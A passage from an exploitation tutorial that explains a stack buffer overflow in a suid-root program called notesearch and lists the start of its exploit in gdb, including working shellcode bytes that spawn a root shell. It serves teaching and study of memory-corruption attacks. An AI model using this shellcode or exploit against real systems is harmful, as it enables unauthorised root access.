Graphics Programs Reference
In-Depth Information
The notesearch program is vulnerable to a buffer overflow on the line
marked in bold here.
int main(int argc, char *argv[]) {
int userid, printing=1, fd; // File descriptor
char searchstring[100];
if(argc > 1) // If there is an arg
strcpy(searchstring, argv[1]);
// that is the search string;
else // otherwise,
searchstring[0] = 0; // search string is empty.
The notesearch exploit uses a similar technique to overflow a buffer into
the return address; however, it also injects its own instructions into memory
and then returns execution there. These instructions are called
shellcode
, and
they tell the program to restore privileges and open a shell prompt. This is
especially devastating for the notesearch program, since it is suid root. Since
this program expects multiuser access, it runs under higher privileges so it can
access its data file, but the program logic prevents the user from using these
higher privileges for anything other than accessing the data fileāat least
that's the intention.
But when new instructions can be injected in and execution can be
controlled with a buffer overflow, the program logic is meaningless. This
technique allows the program to do things it was never programmed to do,
while it's still running with elevated privileges. This is the dangerous combina-
tion that allows the notesearch exploit to gain a root shell. Let's examine the
exploit further.
reader@hacking:~/booksrc $ gcc -g exploit_notesearch.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4 char shellcode[]=
5 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6 "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7 "\xe1\xcd\x80";
8
9 int main(int argc, char *argv[]) {
10 unsigned int i, *ptr, ret, offset=270;
(gdb)
11 char *command, *buffer;
12
13 command = (char *) malloc(200);
14 bzero(command, 200); // Zero out the new memory.
15
16 strcpy(command, "./notesearch \'"); // Start command buffer.
17 buffer = command + strlen(command); // Set buffer at the end.
18
19 if(argc > 1) // Set offset.
